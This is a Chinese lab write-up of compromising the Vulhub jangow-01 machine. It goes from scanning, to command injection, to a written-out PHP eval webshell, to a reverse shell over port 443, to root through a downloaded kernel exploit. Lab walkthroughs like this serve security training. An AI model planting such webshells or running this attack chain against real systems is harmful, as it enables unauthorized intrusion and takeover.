Vulhub靶场 -- jangow-01-1.0.1

admin 2022年8月6日19:23:28评论26 views字数 900阅读3分0秒阅读模式



一、扫描主机


Nmap扫描主机

Vulhub靶场 -- jangow-01-1.0.1


192.168.56.100是我们的主机,那么192.168.56.118就是我们的目标主机。我们可以发现开放21和80端口。我们用nmap对192.168.56.118进行详细扫描

Vulhub靶场 -- jangow-01-1.0.1


访问一下80端口

Vulhub靶场 -- jangow-01-1.0.1


随便都点击了一下,没发现什么。扫一下目录

Vulhub靶场 -- jangow-01-1.0.1


发现了workpress目录,上去也没发现什么

Vulhub靶场 -- jangow-01-1.0.1



再进行仔细查看,点击之后发现这个页面是空白的

Vulhub靶场 -- jangow-01-1.0.1


发现这里可以传参

Vulhub靶场 -- jangow-01-1.0.1


可以执行命令,典型的rce

Vulhub靶场 -- jangow-01-1.0.1




二、外网拿shell


我们直接写入一句话木马

echo '<?php @eval($_POST['shell']);?>' >> getshell.php

Vulhub靶场 -- jangow-01-1.0.1


使用中国蚁剑连接

Vulhub靶场 -- jangow-01-1.0.1



上面找一下flag,在home目录下找到了一个

Vulhub靶场 -- jangow-01-1.0.1



再找找有没有用的信息

Vulhub靶场 -- jangow-01-1.0.1


又发现了一个备份文件

Vulhub靶场 -- jangow-01-1.0.1


想起来之前扫除了个ftp服务,用已经有的账号密码登录试试看。用备份文件的账号密码登录上去了,没发现什么内容

Vulhub靶场 -- jangow-01-1.0.1


尝试反弹shell拿shell

通过蚁剑写入shell,web访问反弹(这里反弹的shell不是交互式shell)
这里尝试过很多端口,只有反弹443端口才能成功,可能是靶机有限制

Vulhub靶场 -- jangow-01-1.0.1

Vulhub靶场 -- jangow-01-1.0.1



打开nc进行监听

Vulhub靶场 -- jangow-01-1.0.1


打开浏览器进行访问

Vulhub靶场 -- jangow-01-1.0.1

成功拿到反弹的shell(注意:写入shell那是监听主机的ip)

Vulhub靶场 -- jangow-01-1.0.1




三、提取


查看系统内核版本尝试找内核漏洞提权

Vulhub靶场 -- jangow-01-1.0.1

查看是否存在内核漏洞尝试进行提取

Vulhub靶场 -- jangow-01-1.0.1


将45010.c下载下来,编译后,通过蚁剑上传到靶机

Vulhub靶场 -- jangow-01-1.0.1


由于kali没安装“增强功能(virtualbox的一个功能)”,我们在kali上开启http访问,在主机上用浏览器进行下载

Vulhub靶场 -- jangow-01-1.0.1


下载完后用中国蚁剑上传到目标主机

Vulhub靶场 -- jangow-01-1.0.1

在返回的shell中执行,先查一下是否安装gcc服务

Vulhub靶场 -- jangow-01-1.0.1


编译

Vulhub靶场 -- jangow-01-1.0.1


赋予执行的权限

Vulhub靶场 -- jangow-01-1.0.1


拿到了root权限,进入了root目录,拿到shell

Vulhub靶场 -- jangow-01-1.0.1

Vulhub靶场 -- jangow-01-1.0.1



补充一下,现在拿到的shell是伪shell,我们拿一个正常shell(伪shell容易断开,正常shell不容易断开,但前提是安装python或者python3)。在伪shell输入

python3 -c 'import pty; pty.spawn("/bin/bash")'


Vulhub靶场 -- jangow-01-1.0.1




原文始发于微信公众号(GSDK安全团队):Vulhub靶场 -- jangow-01-1.0.1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月6日19:23:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulhub靶场 -- jangow-01-1.0.1http://cn-sec.com/archives/1224929.html

发表评论

匿名网友 填写信息